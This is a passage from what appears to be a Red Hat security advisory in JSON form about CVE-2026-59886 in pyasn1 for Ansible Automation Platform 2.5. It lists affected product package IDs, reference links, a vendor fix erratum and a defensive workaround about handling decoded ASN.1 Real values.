"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59886"
},
{
"category": "external",
"summary": "RHBZ#2500041",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500041"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59886",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59886"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59886",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59886"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/commit/e60c691cb91addb8fcefa2f537e85ede6fb1e886",
"url": "https://github.com/pyasn1/pyasn1/commit/e60c691cb91addb8fcefa2f537e85ede6fb1e886"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4",
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-hm4w-wwcw-mr6r",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-hm4w-wwcw-mr6r"
}
],
"release_date": "2026-07-14T16:38:29.691000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "workaround",
"details": "When processing untrusted ASN.1 data with pyasn1, avoid calling prettyPrint(), str(), float(), int(), or performing comparisons or arithmetic on decoded Real (ASN.1 REAL type) objects. Instead, inspect the raw (mantissa, base, exponent) tuple directly. Where logging decoded ASN.1 structures is necessary, filter out or sanitize Real-typed values before conversion.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
